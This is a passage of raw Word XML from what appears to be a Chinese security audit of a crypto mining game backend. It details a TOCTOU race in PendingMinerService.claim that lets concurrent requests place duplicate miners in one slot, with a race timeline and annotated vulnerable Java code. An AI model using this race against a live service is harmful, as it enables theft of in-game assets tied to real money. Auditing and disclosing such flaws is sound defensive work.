        <w:t>takeFromStorage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 等操作）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="617"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">更高等级矿机入槽触发 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>recalcUserLevelAndHashRate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">，若矿机等级 &gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>currentLevel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">，系统自动调用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>grantUsdtOnLevelUp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 发放 USDT 升级奖励</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="618"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>预期结果：在不合法释放坑位的前提下额外获得矿机活跃算力与 USDT 奖励</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>⚠️ 权限要求：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="619"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>是否需要登录：是</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="620"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">权限级别：普通用户；需通过 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>SignAuthTestFilter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 签名校验与 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>TokenAuthFilter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Token 鉴权</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621"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>MinerController.java.move → MinerService.java.moveToSlot → MinerService.java.recalcUserLevelAndHashRate → MinerService.java.grantUsdtOnLevelUp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audit_m153_543_move_ctrl-path5of6.md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：PendingMinerService.java#claim</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:name="heading_28" w:id="28"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>漏洞27：并发坑位占用检查 TOCTOU 竞态条件——可重复领取矿机至同一坑位</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="62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claim</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 方法快照隔离缺陷导致同一坑位放入多台矿机（TOCTOU 竞态）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="62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src/main/java/com/gameBack/mjservice/service/PendingMinerService.java:claim</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="62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62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62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numPr>
          <w:numId w:val="627"/>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claim</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 方法试图通过 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>findByUserIdAndInStorageForUpdate(userId, 0)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>SELECT … FOR UPDATE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 来序列化同一用户的坑位操作，但</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>坑位是否占用的实际判断</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">是通过随后的非加锁普通查询 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>findByUserIdAndSlotIdAndInStorage(userId, slotId, 0)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 执行的。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">MySQL InnoDB 在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>REPEATABLE_READ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（默认隔离级别）下有两类读操作：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="628"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>加锁读（FOR UPDATE）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：始终读取最新已提交数据；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="629"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>一致性快照读（普通 SELECT）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：读取事务内第一次一致性读时所建立的快照。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">当用户拥有 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>两条及以上独立的 `PendingMinerReward` 记录</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">（不同 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>recordId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>）时，两个并发事务 T1、T2 可以分别锁定各自不同的待领取记录，互不阻塞，同时推进到坑位检查阶段。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>竞态时序如下：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步骤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T1（recordId=A）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T2（recordId=B）</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findByIdAndUserIdForUpdate(A, userId)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> → 锁定 A</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findByIdAndUserIdForUpdate(B, userId)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> → 锁定 B</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userSlotUnlockRepository.findByUserIdAndSlotId</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> → </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
                <w:b w:val="true"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>建立 T1 快照（此时 slotId=1 无矿机）</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userSlotUnlockRepository.findByUserIdAndSlotId</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> → </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
                <w:b w:val="true"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>建立 T2 快照（此时 slotId=1 无矿机）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findByUserIdAndInStorageForUpdate(userId, 0)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> → 获取行锁/间隙锁</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findByUserIdAndInStorageForUpdate(userId, 0)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> → 尝试获取锁，可能短暂阻塞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findByUserIdAndSlotIdAndInStorage(userId, 1, 0)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> → </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
                <w:b w:val="true"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>使用 T1 旧快照，坑位为空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等待 T1 释放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 slotId=1 插入矿机，提交事务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 提交后 T2 解除阻塞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findByUserIdAndSlotIdAndInStorage(userId, 1, 0)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> → </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
                <w:b w:val="true"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>使用 T2 旧快照（建立于步骤 2），读不到 T1 插入的矿机，坑位仍显示为空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再次向 slotId=1 插入矿机，提交事务</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>步骤 6 是关键：T2 的一致性快照在步骤 2 建立（T1 尚未 commit），后续普通 SELECT 读取该旧快照，因此 T1 插入的矿机对 T2 不可见。结果：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>slotId=1 被写入两台矿机</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>recalcUserLevelAndHashRate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 将计入双倍算力，用户挖矿收益倍增。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="630"/>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请求携带合法 Bearer Token → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>TokenAuthFilter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 解析 userId → Controller 解析 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>slotId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">（用户可控，1-9）与 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>recordId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">（用户可控，但受 userId 归属校验）→ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>PendingMinerService.claim</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 内的坑位重复检查使用非加锁读，在并发场景下读取旧快照，跳过防重检查 → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>userMinerRepository.save(miner)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 写入重复矿机 → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>minerService.recalcUserLevelAndHashRate(userId)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 重新计算含重复矿机的算力。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="631"/>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：矿机算力直接决定 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>miningBalanceCache</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 中的挖矿余额增速。同一坑位放入 N 台矿机可将该槽位算力放大 N 倍，结合游戏生命周期，可持续非法积累游戏内资产（挖矿余额），其兑换价值直接对应真实资金损失。</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ClaimPendingForm 可控字段：</w:t>
              <w:br/>
              <w:t>//   Integer slotId;   ← 攻击者指定目标坑位（两次请求均传入相同值）</w:t>
              <w:br/>
              <w:t>//   Long recordId;    ← 攻击者分别传入两个不同的有效 recordId</w:t>
              <w:br/>
              <w:t>@PostMapping("/claimPending")</w:t>
              <w:br/>
              <w:t>public ApiResponse&lt;Void&gt; claimPending(@CurrentUserId Long userId,   // ← userId 来自 Token，不可伪造</w:t>
              <w:br/>
              <w:t xml:space="preserve">                                       @RequestBody ClaimPendingForm form) { // ← slotId/recordId 攻击者可控</w:t>
              <w:br/>
              <w:t xml:space="preserve">    pendingMinerService.claim(userId, form.getSlotId(), form.getRecordId()); // ← 两个并发请求携带不同 recordId、相同 slotId</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return ApiResponse.success();</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ② 业务层：PendingMinerService.java（@Transactional）</w:t>
              <w:br/>
              <w:t>public UserMiner claim(Long userId, Integer slotId, Long recordId) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">    PendingMinerReward record = pendingMinerRewardRepository</w:t>
              <w:br/>
              <w:t xml:space="preserve">            .findByIdAndUserIdForUpdate(recordId, userId)         // ← T1 锁 recordId=A，T2 锁 recordId=B，互不阻塞</w:t>
              <w:br/>
              <w:t xml:space="preserve">            .orElseThrow(...);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">    boolean slotUnlocked = slotId &lt;= 6 || userSlotUnlockRepository</w:t>
              <w:br/>
              <w:t xml:space="preserve">            .findByUserIdAndSlotId(userId, slotId)                // ← 【关键】此处为首次一致性快照读，建立 T1/T2 各自的快照</w:t>
              <w:br/>
              <w:t xml:space="preserve">            ...;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">    // 意图：通过 FOR UPDATE 序列化；实际：结果被丢弃，序列化依赖间隙锁，在并发场景下不完整</w:t>
              <w:br/>
              <w:t xml:space="preserve">    userMinerRepository.findByUserIdAndInStorageForUpdate(userId, 0); // ← 加锁读，读最新数据；但序列化窗口存在空隙</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    // 漏洞点：此处为普通一致性快照读，在 REPEATABLE_READ 下使用旧快照</w:t>
              <w:br/>
              <w:t xml:space="preserve">    // T2 在快照建立后才等待 T1 释放锁，快照中 slotId 为空 → 跳过此检查</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (userMinerRepository.findByUserIdAndSlotIdAndInStorage(userId, slotId, 0).isPresent()) { // ← 漏洞点：快照读，T2 看不到 T1 刚插入的矿机</w:t>
              <w:br/>
              <w:t xml:space="preserve">        throw new IllegalArgumentException("该坑位已有矿机");</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">   }</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    UserMiner miner = new UserMiner();</w:t>
              <w:br/>
              <w:t xml:space="preserve">    miner.setUserId(userId);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    miner.setSlotId(slotId);     // ← T1 和 T2 写入相同 slotId</w:t>
              <w:br/>
              <w:t xml:space="preserve">    miner.setInStorage(0);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    miner.setStatus(1);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">    userMinerRepository.save(miner);  // ← 两个并发事务均执行到此，同一坑位写入两台矿机</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">    minerService.recalcUserLevelAndHashRate(userId); // ← 重新计算算力，含重复矿机</w:t>
              <w:br/>
              <w:t xml:space="preserve">    miningBalanceCache.invalidate(userId);           // ← 挖矿余额缓存失效，下次读取将含重复算力</w:t>
              <w:br/>
              <w:t xml:space="preserve">    balancePushService.pushBalance(userId);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return miner;</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 xml:space="preserve">前提：攻击者账号存在两条待领取记录 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
